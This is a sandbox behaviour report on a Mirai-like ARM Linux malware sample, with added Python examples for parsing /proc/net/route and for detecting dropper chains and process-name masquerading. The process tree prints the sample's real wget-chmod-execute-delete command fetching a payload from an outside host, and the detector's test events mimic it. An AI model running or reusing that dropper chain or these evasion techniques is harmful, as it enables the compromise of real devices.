Analysis

Max time kernel: 148s
Max time network: 141s
Platform: debian-9_armhf
Resource: debian9-armhf-20240226-en
Resource tags: arch:armhf, image:debian9-armhf-20240226-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
Submitted: 02/04/2024, 01:15 (read as 2 April 2024: the sandbox image is dated 2024-02-26, so a 4 February date is not possible)
Behavioral task: behavioral1
Sample: 8dba2039fd6f20170d4f1046a5a9d3413c58a657ce34658f5681e07296263d95.elf
Resource: debian9-armhf-20240226-en
General

Target: 8dba2039fd6f20170d4f1046a5a9d3413c58a657ce34658f5681e07296263d95.elf
Size: 122KB
MD5: 74ca17a962720262e4449302a1b295d7
SHA1: 90e9582e7bd4b5766899957a8cb5975124ebac7a
SHA256: 8dba2039fd6f20170d4f1046a5a9d3413c58a657ce34658f5681e07296263d95
SHA512: cd2bb89b171c83f4f2491c05411b85b1c854b941922e119880a8400fcacd1178a2035786049f1db51327d0c5e266c5c5773ac91e7f4749c0db0edb1a0f50ca24
SSDEEP: 3072:FDcYVLWKlAQTv+mYUbpl2m7/L7QsvmGugiNb:WYVxlAk9YUbH2m7/L7QsvmGugiNb
Malware Config
Signatures
Changes its process name (1 IoC)
  Changes the process name, possibly in an attempt to hide itself.
  ioc: sshd | pid: 658 | process: 8dba2039fd6f20170d4f1046a5a9d3413c58a657ce34658f5681e07296263d95.elf

Executes dropped EXE (1 IoC)
  ioc: /tmp/..... | pid: 676 | process: .....

Modifies Watchdog functionality (1 TTP, 2 IoCs)
  Malware like Mirai modifies the watchdog to prevent it from restarting an infected system.
  File opened for modification: /dev/watchdog
  File opened for modification: /dev/misc/watchdog

Reads system routing table (1 TTP, 1 IoC)
  Gets active network interfaces from the /proc virtual filesystem.
  File opened for reading: /proc/net/route | process: 8dba2039fd6f20170d4f1046a5a9d3413c58a657ce34658f5681e07296263d95.elf

Reads system network configuration (1 TTP, 1 IoC)
  Uses contents of the /proc filesystem to enumerate network settings.
  File opened for reading: /proc/net/route | process: 8dba2039fd6f20170d4f1046a5a9d3413c58a657ce34658f5681e07296263d95.elf

Writes file to tmp directory (1 IoC)
  Malware often drops required files in the /tmp directory.
  File opened for modification: /tmp/..... | process: wget
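The two routing signatures above both come from a single read of /proc/net/route. What the sample learns from that file is the set of interfaces with an UP route and, from the entry whose destination and mask are both 0.0.0.0, the interface and gateway that carry its outbound traffic. The parser below is an added example written for this page, not code from the sandbox or from the sample; the route table it parses is constructed inline (the interface names and addresses are invented) so it runs offline. The kernel prints each address as a raw 32-bit value in host byte order, which on little-endian hosts such as armhf and x86 appears byte-reversed in hex; the decoder handles that.

```python
import socket
import struct

# Constructed sample in the format of /proc/net/route. Interfaces and
# addresses are invented for this example; they are not from the sandbox run.
SAMPLE_ROUTE = (
    "Iface\tDestination\tGateway \tFlags\tRefCnt\tUse\tMetric\tMask\t\tMTU\tWindow\tIRTT\n"
    "eth0\t00000000\t0101A8C0\t0003\t0\t0\t0\t00000000\t0\t0\t0\n"
    "eth0\t0001A8C0\t00000000\t0001\t0\t0\t0\t00FFFFFF\t0\t0\t0\n"
    "wlan0\t000AA8C0\t00000000\t0001\t0\t0\t0\t00FFFFFF\t0\t0\t0\n"
)

RTF_UP = 0x0001       # route is usable
RTF_GATEWAY = 0x0002  # destination is reached via a gateway


def hex_to_ipv4(field):
    """Decode a /proc/net/route hex field (host-order u32) into dotted quad.

    On a little-endian host the hex string reads byte-reversed, so the value
    is packed little-endian before conversion.
    """
    return socket.inet_ntoa(struct.pack("<L", int(field, 16)))


def parse_proc_net_route(text):
    """Parse the text of /proc/net/route into a list of route dicts."""
    routes = []
    for line in text.splitlines()[1:]:  # first line is the column header
        if not line.strip():
            continue
        f = line.split()
        routes.append({
            "iface": f[0],
            "dest": hex_to_ipv4(f[1]),
            "gateway": hex_to_ipv4(f[2]),
            "flags": int(f[3], 16),
            "metric": int(f[6]),
            "mask": hex_to_ipv4(f[7]),
        })
    return routes


def default_routes(routes):
    """Entries with destination 0.0.0.0/0: the path outbound traffic takes."""
    return [r for r in routes
            if r["flags"] & RTF_UP and r["dest"] == "0.0.0.0" and r["mask"] == "0.0.0.0"]


def active_interfaces(routes):
    """Interface names that carry at least one UP route (what the sample enumerates)."""
    return sorted({r["iface"] for r in routes if r["flags"] & RTF_UP})


if __name__ == "__main__":
    parsed = parse_proc_net_route(SAMPLE_ROUTE)
    for r in default_routes(parsed):
        print("default route via", r["gateway"], "on", r["iface"])
    print("active interfaces:", active_interfaces(parsed))
```

On a live host, pass the contents of /proc/net/route to parse_proc_net_route; no privileges are needed to read it, which is exactly why malware can use it for reconnaissance without tripping a permission check. A read of this file by a process running out of /tmp is a cheap indicator to alert on.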
Processes

Process tree (image, then command line, then PID; indentation shows parent and child):

/tmp/8dba2039fd6f20170d4f1046a5a9d3413c58a657ce34658f5681e07296263d95.elf
  /tmp/8dba2039fd6f20170d4f1046a5a9d3413c58a657ce34658f5681e07296263d95.elf  (PID 658)
  - Changes its process name
  - Reads system routing table
  - Reads system network configuration

  /bin/sh
    /bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."  (PID 659)

    /usr/bin/wget
      wget -q http://gay.energy/.../vivid -O .....  (PID 663)
      - Writes file to tmp directory

    /bin/chmod
      chmod 777 .....  (PID 674)

    /tmp/.....
      ./.....  (PID 676)
      - Executes dropped EXE

    /bin/sh
      /bin/sh ./.....  (PID 676)

    /bin/rm
      rm -rf .....  (PID 680)

The chain is the usual one-line dropper: fetch a second stage over plain HTTP into the working directory, chmod 777 it, run it, then delete it so nothing remains on disk. PID 676 appears twice, first as the dropped file /tmp/..... being executed directly and then as /bin/sh ./..... under the same PID; a payload re-run through /bin/sh without a new PID is consistent with the downloaded file being a shell script rather than a native ELF, but the report does not show the file's contents, so that remains unconfirmed.
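The process tree above is a compact detection opportunity: a shell spawned with -c whose command line downloads, chmods, executes and deletes the same file, plus a process that reports itself as sshd while its image lives in /tmp. The detector below is an added example for this page, not tooling from the sandbox vendor. The event records it runs over are constructed inline in an assumed shape (pid, ppid, comm, exe, argv) rather than any real auditd or eBPF format, and the names, PIDs and URL in them are invented; only the shape of the dropper command is modelled on the one in the report.

```python
import re
import shlex

# Constructed process-creation events in an assumed shape. PIDs, names and the
# URL are invented; the sh -c command line mirrors the report's dropper chain.
EVENTS = [
    {"pid": 100, "ppid": 1, "comm": "sshd", "exe": "/tmp/sample.elf",
     "argv": ["sshd"]},
    {"pid": 101, "ppid": 100, "comm": "sh", "exe": "/bin/sh",
     "argv": ["/bin/sh", "-c",
              "wget -q http://example.invalid/x -O .x;chmod 777 .x;./.x;rm -rf .x"]},
    {"pid": 102, "ppid": 101, "comm": "wget", "exe": "/usr/bin/wget",
     "argv": ["wget", "-q", "http://example.invalid/x", "-O", ".x"]},
    {"pid": 103, "ppid": 101, "comm": "chmod", "exe": "/bin/chmod",
     "argv": ["chmod", "777", ".x"]},
    {"pid": 104, "ppid": 101, "comm": ".x", "exe": "/tmp/.x",
     "argv": ["./.x"]},
    {"pid": 105, "ppid": 101, "comm": "rm", "exe": "/bin/rm",
     "argv": ["rm", "-rf", ".x"]},
    # Benign control: the real sshd and an ordinary shell command.
    {"pid": 200, "ppid": 1, "comm": "sshd", "exe": "/usr/sbin/sshd",
     "argv": ["/usr/sbin/sshd", "-D"]},
    {"pid": 201, "ppid": 200, "comm": "sh", "exe": "/bin/sh",
     "argv": ["/bin/sh", "-c", "ls -la /tmp"]},
]

# Daemon names a dropper is likely to masquerade as (assumed list).
SYSTEM_NAMES = {"sshd", "dropbear", "busybox", "init", "telnetd", "watchdog"}
UNTRUSTED_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
SHELLS = ("sh", "bash", "ash", "dash")


def basename(path):
    return path.rsplit("/", 1)[-1]


def split_shell_chain(cmd):
    """Split a `sh -c` string into simple commands on ; && || | and newlines."""
    parts = re.split(r"\s*(?:;|&&|\|\||\||\n)\s*", cmd)
    return [shlex.split(p) for p in parts if p.strip()]


def download_target(argv):
    """Local file written by a wget -O / curl -o invocation, or None."""
    flags = {"wget": ("-O",), "curl": ("-o", "--output")}.get(basename(argv[0]))
    if not flags:
        return None
    for i, a in enumerate(argv):
        if a in flags and i + 1 < len(argv):
            return argv[i + 1]
    return None


def dropper_chain_in(cmd):
    """Return {"target", "stages"} when the command line downloads a file and
    then executes it (chmod and delete stages are recorded when present)."""
    target, stages = None, []
    for argv in split_shell_chain(cmd):
        if not argv:
            continue
        if target is None:
            target = download_target(argv)
            if target is not None:
                stages.append("download")
            continue
        tool = basename(argv[0])
        if tool == "chmod" and target in argv and any(
                a in ("777", "755", "+x", "a+x", "u+x") for a in argv[1:]):
            stages.append("chmod")
        elif argv[0] in (target, "./" + basename(target)) or (
                tool in SHELLS and target in argv):
            stages.append("execute")
        elif tool == "rm" and target in argv:
            stages.append("delete")
    if "download" in stages and "execute" in stages:
        return {"target": target, "stages": stages}
    return None


def detect(events):
    """Apply the three rules suggested by the report's process tree."""
    findings = []
    for ev in events:
        argv, exe = ev["argv"], ev["exe"]
        if basename(exe) in SHELLS and "-c" in argv and argv.index("-c") + 1 < len(argv):
            chain = dropper_chain_in(argv[argv.index("-c") + 1])
            if chain:
                findings.append({"rule": "dropper-chain", "pid": ev["pid"], **chain})
        if ev["comm"] in SYSTEM_NAMES and exe.startswith(UNTRUSTED_DIRS):
            findings.append({"rule": "name-masquerade", "pid": ev["pid"],
                             "comm": ev["comm"], "exe": exe})
        if exe.startswith(UNTRUSTED_DIRS):
            findings.append({"rule": "exec-from-tmp", "pid": ev["pid"], "exe": exe})
    return findings


if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f)
```

The name-masquerade rule keys on the mismatch between the process name (comm or argv[0]) and the executable's path, which is the only reliable way to catch the "Changes its process name" behaviour: the name alone looks like a legitimate daemon. Mounting /tmp, /var/tmp and /dev/shm with noexec breaks the execute step of this chain outright, although it does not stop an interpreter being pointed at the file, which is why the execute check also matches `sh <target>`.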